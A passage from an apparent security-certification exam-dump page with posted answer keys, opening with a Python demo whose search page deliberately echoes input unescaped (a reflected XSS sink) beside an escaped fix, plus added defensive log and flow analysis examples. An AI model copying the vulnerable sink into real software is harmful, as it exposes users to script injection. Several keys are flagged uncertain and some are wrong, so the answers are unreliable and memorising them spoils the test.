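    """Same page with output encoding applied where the data enters the markup."""
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in COMMENTS_DB) + "</ul>"


def search_page_vulnerable(query):
    """Reflected XSS sink: the query parameter is echoed back unescaped."""
    return f"<h1>Results for {query}</h1>"


def search_page_fixed(query):
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def contains_script(page):
    """Crude reviewer check: did user input break out of text context into a tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    store_comment("nice post")
    store_comment(PAYLOAD)
    print(render_comments_vulnerable())
    print(render_comments_fixed())
```

Escaping is context-specific: `html.escape` is correct for text between tags and inside quoted attribute values, but data placed inside a `<script>` block or a URL needs that context's own encoding.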

Which type of attack occurs when an attacker utilizes a botnet to reflect requests off an
NTP server to overwhelm their target?

08/09/2017 – by Mod_GuideK 1

Which type of attack occurs when an attacker utilizes a botnet to reflect requests off an NTP
server to overwhelm their target?
A. man in the middle
B. denial of service
C. distributed denial of service
D. replay

HIDE ANSWERS
Correct Answer: C

Which flags indicate that an HTTP connection was stopped by a security appliance, like a
firewall, before it could be built fully?

08/09/2017 – by Mod_GuideK 2

In NetFlow records, which flags indicate that an HTTP connection was stopped by a security
appliance, like a firewall, before it could be built fully?
A. ACK
B. SYN ACK
C. RST
D. PSH, ACK

HIDE ANSWERS
Correct Answer: C
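
In NetFlow the TCP flags field is the cumulative OR of every flag seen in the flow, so a connection that never got past the handshake shows SYN (and perhaps ACK) plus RST and no PSH or FIN, while a completed session shows SYN, ACK, PSH and FIN. The block below is an added example (Python, not the page's or the exam's code) that decodes that byte and classifies constructed flow records; the record layout is an assumption, and note that in strictly unidirectional exports the RST sent by an inline appliance lands in the reverse-direction record, so pair the two directions before applying the logic.

```python
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
NAMES = [(URG, "URG"), (ACK, "ACK"), (PSH, "PSH"), (RST, "RST"), (SYN, "SYN"), (FIN, "FIN")]


def flags_to_names(bits):
    """Decode the cumulative tcpFlags byte into flag names."""
    return [name for bit, name in NAMES if bits & bit]


def classify(bits):
    """Interpret the cumulative flags of a (bidirectional) TCP flow record."""
    if bits & RST and not bits & (PSH | FIN):
        return "reset_before_data"   # torn down by RST before any data: firewall/IPS block or closed port
    if bits & SYN and not bits & ACK:
        return "syn_unanswered"      # SYN went out, nothing came back: silently dropped or host down
    if bits & SYN and bits & ACK and bits & FIN:
        return "completed"           # full handshake, data, orderly close
    if bits & SYN and bits & ACK:
        return "established_open"    # handshake seen, still open when the record was exported
    return "midstream"               # no SYN: the flow predates the export window


# Constructed flow records: (src, dst, dport, cumulative flags, octets)
FLOWS = [
    ("10.1.1.5", "203.0.113.10", 80, SYN | ACK | PSH | FIN, 15320),   # normal HTTP fetch
    ("10.1.1.5", "203.0.113.99", 80, SYN | RST, 120),                # blocked by an inline appliance
    ("10.1.1.5", "198.51.100.7", 80, SYN, 60),                       # no reply at all
    ("10.1.1.9", "203.0.113.10", 443, ACK | PSH, 9000),              # long-lived session, mid-flow export
    ("10.1.1.9", "203.0.113.10", 8080, SYN | ACK | RST, 180),        # answered, then reset before data
]


def summarize(flows):
    return [(src, dst, dport, flags_to_names(f), classify(f)) for src, dst, dport, f, _ in flows]


def blocked_connections(flows):
    """Flows an analyst pulls when asked which HTTP connections the firewall stopped."""
    return [(src, dst, dport) for src, dst, dport, f, _ in flows if classify(f) == "reset_before_data"]


if __name__ == "__main__":
    for row in summarize(FLOWS):
        print(row)
```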

Which definition of an antivirus program is true?

08/09/2017 – by Mod_GuideK 0

Which definition of an antivirus program is true?

A. program used to detect and remove unwanted malicious software from the system
B. program that provides real time analysis of security alerts generated by network
hardware and application
C. program that scans a running application for vulnerabilities
D. rules that allow network traffic to go in and out

HIDE ANSWERS
Correct Answer: A

Which type of attack occurs when an attacker is successful in eavesdropping on a
conversation between two IP phones?

08/09/2017 – by Mod_GuideK 0

Which type of attack occurs when an attacker is successful in eavesdropping on a conversation
between two IP phones?
A. replay
B. man-in-the-middle
C. dictionary
D. known-plaintext

HIDE ANSWERS
Correct Answer: B

Which evasion technique does this attempt indicate?

08/09/2017 – by Mod_GuideK 4

An intrusion detection system begins receiving an abnormally high volume of scanning from
numerous sources. Which evasion technique does this attempt indicate?
A. traffic fragmentation
B. resource exhaustion
C. timing attack
D. tunneling

HIDE ANSWERS
Correct Answer: B (A ???)

While viewing packet capture data, you notice that one IP is sending and receiving traffic
for multiple devices by modifying the IP header. Which option is making this behavior
possible?

08/09/2017 – by Mod_GuideK 0

While viewing packet capture data, you notice that one IP is sending and receiving traffic for
multiple devices by modifying the IP header. Which option is making this behavior possible?
A. TOR
B. NAT
C. encapsulation
D. tunneling

HIDE ANSWERS
Correct Answer: B
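
A stateful firewall logs each connection when it is built and when it is torn down, keyed by the TCP/UDP 5-tuple, and records the NAT translation it applied. Those two facts are what make the answers to the earlier firewall-log question (confirm connection timing per 5-tuple; map internal addresses to their translated public addresses) possible, and they are how an analyst walks back from the single public IP seen in a capture, as in this question, to the internal host behind it. The block below is an added example (Python, not the page's or the exam's code) over constructed log lines in a generic BUILT/TEARDOWN/xlate format; the format is an assumption, not any vendor's syntax.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log in a generic stateful-firewall style (not a real vendor format).
SAMPLE_LOG = """\
2017-08-09T10:00:01Z BUILT tcp 10.1.1.5:51000 -> 203.0.113.10:443 xlate 198.51.100.2:40001
2017-08-09T10:00:02Z BUILT tcp 10.1.1.7:52000 -> 203.0.113.10:443 xlate 198.51.100.2:40002
2017-08-09T10:00:09Z TEARDOWN tcp 10.1.1.5:51000 -> 203.0.113.10:443 xlate 198.51.100.2:40001 bytes 5120
2017-08-09T10:00:03Z BUILT udp 10.1.1.5:53001 -> 203.0.113.53:53 xlate 198.51.100.2:40003
2017-08-09T10:00:03Z TEARDOWN udp 10.1.1.5:53001 -> 203.0.113.53:53 xlate 198.51.100.2:40003 bytes 210
2017-08-09T10:01:02Z TEARDOWN tcp 10.1.1.7:52000 -> 203.0.113.10:443 xlate 198.51.100.2:40002 bytes 88000
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>BUILT|TEARDOWN) (?P<proto>tcp|udp) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"xlate (?P<xip>[\d.]+):(?P<xport>\d+)(?: bytes (?P<bytes>\d+))?$"
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["bytes"] = int(rec["bytes"]) if rec["bytes"] else 0
    return rec


def five_tuple(rec):
    """The 5-tuple under which the firewall tracks this connection in its state table."""
    return (rec["proto"], rec["src"], int(rec["sport"]), rec["dst"], int(rec["dport"]))


def connection_durations(log_text):
    """Pair BUILT with TEARDOWN per 5-tuple.  Returns ({5-tuple: info}, [still-open 5-tuples])."""
    starts, result = {}, {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = five_tuple(rec)
        if rec["event"] == "BUILT":
            starts[key] = rec["ts"]
        elif key in starts:
            start = starts.pop(key)
            result[key] = {"start": start, "end": rec["ts"],
                           "seconds": (rec["ts"] - start).total_seconds(), "bytes": rec["bytes"]}
    return result, sorted(starts)


def nat_table(log_text):
    """Map (internal ip, port) -> translated (public ip, port) pairs.  With PAT every host
    shares one public IP, so the translated *port* is what identifies the inside host."""
    table = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            table[(rec["src"], int(rec["sport"]))].add((rec["xip"], int(rec["xport"])))
    return {k: sorted(v) for k, v in table.items()}


def internal_host_for(log_text, public_ip, public_port):
    """Reverse lookup: which internal host:port sat behind a given translated ip:port?"""
    for inside, outsides in nat_table(log_text).items():
        if (public_ip, public_port) in outsides:
            return inside
    return None


if __name__ == "__main__":
    durations, still_open = connection_durations(SAMPLE_LOG)
    for key, info in durations.items():
        print(key, info["seconds"], "s", info["bytes"], "bytes")
    print(internal_host_for(SAMPLE_LOG, "198.51.100.2", 40002))
```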

Which layer?

08/09/2017 – by Mod_GuideK 0

A firewall requires deep packet inspection to evaluate which layer?

A. application
B. Internet
C. link
D. transport

HIDE ANSWERS
Correct Answer: A

Which two protocols are used for email? (Choose two.)

08/09/2017 – by Mod_GuideK 0

Which two protocols are used for email? (Choose two.)

A. NTP
B. DNS
C. HTTP
D. IMAP
E. SMTP

HIDE ANSWERS
Correct Answer: DE

Which two options are recognized forms of phishing?

08/09/2017 – by Mod_GuideK 0

Which two options are recognized forms of phishing? (Choose two.)

A. spear
B. whaling
C. mailbomb
D. hooking
E. mailnet

HIDE ANSWERS
Correct Answer: AB

Which security monitoring data type requires the most storage space?

08/09/2017 – by Mod_GuideK 1

Which security monitoring data type requires the most storage space?
A. full packet capture
B. transaction data
C. statistical data
D. session data

HIDE ANSWERS
Correct Answer: A

Which type of exploit normally requires the culprit to have prior access to the target
system?

08/09/2017 – by Mod_GuideK 1

Which type of exploit normally requires the culprit to have prior access to the target system?
A. local exploit
B. denial of service
C. system vulnerability
D. remote exploit

HIDE ANSWERS
Correct Answer: A

Which identifier is used to describe the application or process that submitted a log
message?

08/09/2017 – by Mod_GuideK 1

Which identifier is used to describe the application or process that submitted a log message?
A. action
B. selector
C. priority
D. facility

HIDE ANSWERS
Correct Answer: D
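
The syslog facility is carried in the PRI field at the start of every message: PRI = facility * 8 + severity, so `<34>` decodes to facility 4 (auth) and severity 2 (crit). The block below is an added example (Python, not from the page or the exam) that decodes PRI, re-encodes it, and buckets constructed sample lines by the facility that submitted them, which is the field a collector or SIEM normally routes on. The sample lines are constructed; the facility and severity tables are the RFC 3164 / RFC 5424 values.

```python
import re

FACILITIES = {
    0: "kern", 1: "user", 2: "mail", 3: "daemon", 4: "auth", 5: "syslog", 6: "lpr",
    7: "news", 8: "uucp", 9: "cron", 10: "authpriv", 11: "ftp",
    16: "local0", 17: "local1", 18: "local2", 19: "local3",
    20: "local4", 21: "local5", 22: "local6", 23: "local7",
}
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.DOTALL)


def decode_pri(pri):
    """PRI = facility * 8 + severity; valid range is 0..191."""
    if not 0 <= pri <= 191:
        raise ValueError(f"PRI out of range: {pri}")
    facility, severity = divmod(pri, 8)
    return FACILITIES.get(facility, f"facility{facility}"), SEVERITIES[severity]


def encode_pri(facility_name, severity_name):
    """Inverse of decode_pri, e.g. ('auth', 'crit') -> 34."""
    facility = next(code for code, name in FACILITIES.items() if name == facility_name)
    return facility * 8 + SEVERITIES.index(severity_name)


def parse_syslog(line):
    """Split a raw syslog line into facility, severity and the remaining message text."""
    m = PRI_RE.match(line)
    if not m:
        return None
    facility, severity = decode_pri(int(m.group(1)))
    return {"facility": facility, "severity": severity, "rest": m.group(2)}


# Constructed sample lines in RFC 3164 style.
SAMPLE = [
    "<34>Aug  9 10:00:01 fw01 sshd[2211]: Failed password for root from 203.0.113.5 port 40022 ssh2",
    "<13>Aug  9 10:00:02 host1 user: login ok",
    "<166>Aug  9 10:00:03 asa01 %ASA-6-302013: Built outbound TCP connection",
]


def by_facility(lines):
    """Bucket messages by submitting facility, collecting the severities seen in each."""
    buckets = {}
    for line in lines:
        rec = parse_syslog(line)
        if rec:
            buckets.setdefault(rec["facility"], []).append(rec["severity"])
    return buckets


if __name__ == "__main__":
    for line in SAMPLE:
        print(parse_syslog(line))
```

The facility tells you which subsystem wrote the message, not which host: the sending device is in the HOSTNAME field that follows the timestamp.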

Which concern is important when monitoring NTP servers for abnormal levels of traffic?

08/09/2017 – by Mod_GuideK 5

Which concern is important when monitoring NTP servers for abnormal levels of traffic?
A. Being the cause of a distributed reflection denial of service attack.
B. Users changing the time settings on their systems.
C. A critical server may not have the correct time synchronized.
D. Watching for rogue devices that have been added to the network.

HIDE ANSWERS
Correct Answer: A
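
Both NTP questions on this page describe the same attack from opposite ends: a botnet sends small requests to NTP servers with the victim's address as the spoofed source, and the servers answer the victim with far larger replies (a distributed reflection DoS). From the server operator's side the tell is an amplification ratio, bytes out to a peer far exceeding bytes in from it, often aimed at a service port rather than UDP/123. The block below is an added example (Python, not the page's or the exam's code) that computes that ratio from constructed per-direction flow records; the record layout and thresholds are assumptions to tune for your environment.

```python
from collections import defaultdict

# Constructed flow records seen on the NTP server's interface.
# (direction, peer_ip, peer_port, packets, bytes); 'in' = request to us, 'out' = our reply.
FLOWS = [
    ("in",  "192.0.2.10",   123, 30, 2280),         # legitimate client: small polls ...
    ("out", "192.0.2.10",   123, 30, 2280),         # ... answered with equally small replies
    ("in",  "198.51.100.5", 80, 200, 9600),         # "requests" claiming to come from a web server port
    ("out", "198.51.100.5", 80, 20000, 9640000),    # we flood that port with large replies
    ("in",  "198.51.100.6", 53, 150, 7200),
    ("out", "198.51.100.6", 53, 15000, 7200000),
]


def amplification_by_peer(flows):
    """Aggregate traffic per peer and compute bytes_out / bytes_in.  In a reflection attack
    the peer is the spoofed victim, so the server sends far more than it receives."""
    stats = defaultdict(lambda: {"pkts_in": 0, "bytes_in": 0, "pkts_out": 0, "bytes_out": 0})
    for direction, ip, port, pkts, nbytes in flows:
        s = stats[ip]
        s["pkts_" + direction] += pkts
        s["bytes_" + direction] += nbytes
        s["port"] = port
    for s in stats.values():
        s["ratio"] = s["bytes_out"] / s["bytes_in"] if s["bytes_in"] else float("inf")
    return dict(stats)


def suspected_reflection_victims(flows, min_ratio=10.0, min_bytes_out=1_000_000):
    """Peers for which this server is acting as an amplifier.  The peer port is a second
    signal: genuine clients use UDP/123 or an ephemeral port, while spoofed requests often
    carry the victim's service port so the reply flood lands on it."""
    victims = []
    for ip, s in amplification_by_peer(flows).items():
        if s["ratio"] >= min_ratio and s["bytes_out"] >= min_bytes_out:
            victims.append({"victim": ip, "ratio": round(s["ratio"], 1),
                            "bytes_out": s["bytes_out"], "target_port": s["port"]})
    return sorted(victims, key=lambda v: -v["bytes_out"])


if __name__ == "__main__":
    for victim in suspected_reflection_victims(FLOWS):
        print(victim)
```

The classic amplifier on ntpd is the mode 7 `monlist` query; `disable monitor` and a `restrict default ... noquery` line in ntp.conf remove it, after which the ratio for any peer should sit near 1 as it does for 192.0.2.10 above.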

Which protocol is primarily supported by the third layer of the Open Systems
Interconnection reference model?

08/09/2017 – by Mod_GuideK 0

Which protocol is primarily supported by the third layer of the Open Systems Interconnection
reference model?
A. HTTP/TLS
B. IPv4/IPv6
C. TCP/UDP
D. ATM/ MPLS

HIDE ANSWERS
Correct Answer: B

Which term represents a potential danger that could take advantage of a weakness in a
system?

08/09/2017 – by Mod_GuideK 16

Which term represents a potential danger that could take advantage of a weakness in a system?
A. vulnerability
B. risk
C. threat
D. exploit

HIDE ANSWERS
Correct Answer: D (C????)

Which security principle states that more than one person is required to perform a critical
task?

08/09/2017 – by Mod_GuideK 1

Which security principle states that more than one person is required to perform a critical task?
A. due diligence
B. separation of duties
C. need to know
D. least privilege

HIDE ANSWERS
Correct Answer: B

Which main purpose of this framework is true?

08/09/2017 – by Mod_GuideK 3

You must create a vulnerability management framework. Which main purpose of this framework
is true?
A. Conduct vulnerability scans on the network.
B. Manage a list of reported vulnerabilities.
C. Identify, remove, and mitigate system vulnerabilities.
D. Detect and remove vulnerabilities in source code.

HIDE ANSWERS
Correct Answer: C

Which information is the term PHI used to describe?

08/09/2017 – by Mod_GuideK 0

In computer security, which information is the term PHI used to describe?

A. private host information
B. protected health information
C. personal health information
D. protected host information

HIDE ANSWERS
Correct Answer: B

Which event occurs when a signature-based IDS encounters network traffic that triggers
an alert?

08/09/2017 – by Mod_GuideK 0

Which event occurs when a signature-based IDS encounters network traffic that triggers an alert?
A. connection event
B. endpoint event
C. NetFlow event
D. intrusion event

HIDE ANSWERS
Correct Answer: D

Which data can be obtained using NetFlow?

08/09/2017 – by Mod_GuideK 0

Which data can be obtained using NetFlow?

A. session data
B. application logs
C. network downtime
D. report full packet capture

HIDE ANSWERS
Correct Answer: A

Which term describes the act of a user, without authority or permission, obtaining rights
on a system, beyond what were assigned?

08/09/2017 – by Mod_GuideK 0

Which term describes the act of a user, without authority or permission, obtaining rights on a
system, beyond what were assigned?
A. authentication tunneling
B. administrative abuse
C. rights exploitation
D. privilege escalation

HIDE ANSWERS
Correct Answer: D

Which cause of this problem is true?

08/09/2017 – by Mod_GuideK 2

Refer to the exhibit. A TFTP server has recently been installed in the Atlanta office. The network
administrator is located in the NY office and has attempted to make a connection to the TFTP
server. They are unable to backup the configuration file and Cisco IOS of the NY router to the
TFTP server
Which cause of this problem is true?
A. The TFTP server cannot obtain an address from a DHCP Server.
B. The TFTP server has an incorrect IP address.
C. The network administrator computer has an incorrect IP address
D. The TFTP server has an incorrect subnet mask.

HIDE ANSWERS
Correct Answer: A (B???)

Which definition of a daemon on Linux is true?

08/09/2017 – by Mod_GuideK 0

Which definition of a daemon on Linux is true?

A. error check right after the call to fork a process
B. new process created by duplicating the calling process
C. program that runs unobtrusively in the background
D. set of basic CPU instructions

HIDE ANSWERS
Correct Answer: C
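
fork() creates a new process by duplicating the caller (the fork question earlier on this page); a daemon is what you get when that child detaches from its controlling terminal and keeps running in the background. What ties the two together is the process table: a child that has exited stays in it, in state Z, until its parent collects the exit status with wait(). The block below is an added example (Python on Linux, not the page's or the exam's code) that forks a child, lets it exit, observes the zombie entry in /proc, then reaps it. Reading /proc is a Linux assumption; on other systems the state is reported as None.

```python
import os
import time


def proc_state(pid):
    """State letter from /proc/<pid>/stat (Linux only), or None if the entry is unavailable.
    'Z' means zombie: the process has exited but its table entry is still waiting to be
    collected by the parent."""
    try:
        with open(f"/proc/{pid}/stat") as fh:
            data = fh.read()
    except OSError:
        return None
    # The comm field is parenthesised and may contain spaces; the state follows the ')'.
    return data[data.rindex(")") + 2]


def fork_and_reap(exit_code):
    """fork() a child that exits with exit_code, observe it un-reaped, then reap it.

    Returns the child's pid, its /proc state while un-reaped, the exit status the parent
    recovered via waitpid(), and whether the table entry vanished after reaping."""
    pid = os.fork()
    if pid == 0:
        # Child branch: fork() returned 0 here.  _exit() skips interpreter cleanup that
        # belongs to the parent (buffer flushes, atexit handlers).
        os._exit(exit_code)

    # Parent branch.  Wait for termination WITHOUT collecting the status (WNOWAIT), so the
    # child lingers in the table as a zombie that we can look at.
    if hasattr(os, "waitid"):
        os.waitid(os.P_PID, pid, os.WEXITED | os.WNOWAIT)
    else:
        time.sleep(0.2)   # fallback: give the child time to exit
    zombie_state = proc_state(pid)

    # Now reap: the kernel frees the entry and hands the parent the exit status.
    _, status = os.waitpid(pid, 0)
    return {
        "pid": pid,
        "zombie_state": zombie_state,
        "exit_code": os.WEXITSTATUS(status),
        "gone_after_reap": proc_state(pid) is None,
    }


if __name__ == "__main__":
    print(fork_and_reap(7))
```

A daemon is built from the same primitive: the parent forks, the child calls setsid() to leave the session, often forks once more so it can never reacquire a terminal, and the original parent exits so the daemon is inherited and reaped by init.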

Which definition of vulnerability is true?

08/09/2017 – by Mod_GuideK 0

Which definition of vulnerability is true?

A. an exploitable unpatched and unmitigated weakness in software
B. an incompatible piece of software
C. software that does not have the most current patch applied
D. software that was not approved for installation

HIDE ANSWERS
Correct Answer: A

Which option is an advantage to using network-based anti-virus versus host-based anti-virus?

08/09/2017 – by Mod_GuideK 7

Which option is an advantage to using network-based anti-virus versus host-based anti-virus?
A. Network-based has the ability to protect unmanaged devices and unsupported operating
systems.
B. There are no advantages compared to host-based antivirus.
C. Host-based antivirus does not have the ability to collect newly created signatures.
D. Network-based can protect against infection from malicious files at rest.

HIDE ANSWERS
Correct Answer: A (D???)

Which evasion method involves performing actions slower than normal to prevent
detection?

08/09/2017 – by Mod_GuideK 3

Which evasion method involves performing actions slower than normal to prevent detection?
A. traffic fragmentation
B. tunneling
C. timing attack
D. resource exhaustion

HIDE ANSWERS
Correct Answer: C (A???)

Which hashing algorithm is the least secure?

08/09/2017 – by Mod_GuideK 3

Which hashing algorithm is the least secure?

A. MD5
B. RC4
C. SHA-3
D. SHA-2

HIDE ANSWERS
Correct Answer: A

Which protocol is expected to have user agent, host, and referrer headers in a packet
capture?

08/09/2017 – by Mod_GuideK 8

Which protocol is expected to have user agent, host, and referrer headers in a packet
capture?
A. NTP
B. HTTP
C. DNS
D. SSH

HIDE ANSWERS
Correct Answer: B

Which definition of permissions in Linux is true?

08/09/2017 – by Mod_GuideK 1

Which definition of permissions in Linux is true?

A. rules that allow network traffic to go in and out
B. table maintenance program
C. written affidavit that you have to sign before using the system
D. attributes of ownership and control of an object

HIDE ANSWERS
Correct Answer: D
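
Linux file permissions are the everyday instance of the discretionary access control model from the earlier question: the owner of an object decides who may read, write or execute it, and the kernel applies exactly one class (owner, group or other) to each caller. The block below is an added example (Python, not the page's or the exam's code) that parses the `ls -l` permission field, converts it to octal, and evaluates access the way the kernel does, including the case that surprises people: an owner whose own class is more restrictive than the group's. The file table and uids are constructed.

```python
def parse_mode(mode_str):
    """Convert the 9-character permission field of ls -l (e.g. 'rwxr-x---') to an int."""
    if len(mode_str) != 9:
        raise ValueError("expected 9 permission characters")
    bits = 0
    for ch in mode_str:
        bits = (bits << 1) | (ch != "-")
    return bits


def mode_to_octal(mode_str):
    """'rwxr-x---' -> '750', the form chmod accepts."""
    return format(parse_mode(mode_str), "03o")


def can_access(mode_str, owner, group, uid, gids, want):
    """Discretionary access check for a regular file, in the order the kernel uses:
    the owner class if uid matches, else the group class if any of the caller's groups
    matches, else 'other'.  Only ONE class applies, so an owner with 'r--' cannot write a
    file that grants 'rw-' to its group.  want is 'r', 'w' or 'x'; uid 0 bypasses the check."""
    if uid == 0:
        return True
    mode = parse_mode(mode_str)
    if uid == owner:
        shift = 6
    elif group in gids:
        shift = 3
    else:
        shift = 0
    cls = (mode >> shift) & 0o7
    need = {"r": 0o4, "w": 0o2, "x": 0o1}[want]
    return bool(cls & need)


# Constructed file table: (path, perms, owner uid, group gid).  The owner of each object,
# not an administrator, chose these bits: that is what makes the model discretionary.
FILES = [
    ("/srv/app/config.ini", "rw-r-----", 1001, 2001),
    ("/srv/app/deploy.sh",  "rwxr-x---", 1001, 2001),
    ("/home/bob/secret",    "r--rw----", 1002, 2001),
]


def readable_by(uid, gids):
    """Paths a given caller can read under the table above."""
    return [path for path, perms, owner, group in FILES
            if can_access(perms, owner, group, uid, gids, "r")]


if __name__ == "__main__":
    for path, perms, owner, group in FILES:
        print(path, perms, mode_to_octal(perms))
    print(readable_by(1005, [2001]))
```

Mandatory controls such as SELinux are evaluated in addition to these bits and can deny what the mode would allow; the check above is the discretionary layer only.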

Which definition of a process in Windows is true?

08/09/2017 – by Mod_GuideK 0

Which definition of a process in Windows is true?

A. running program
B. unit of execution that must be manually scheduled by the application
C. database that stores low-level settings for the OS and for certain applications
D. basic unit to which the operating system allocates processor time

HIDE ANSWERS
Correct Answer: A
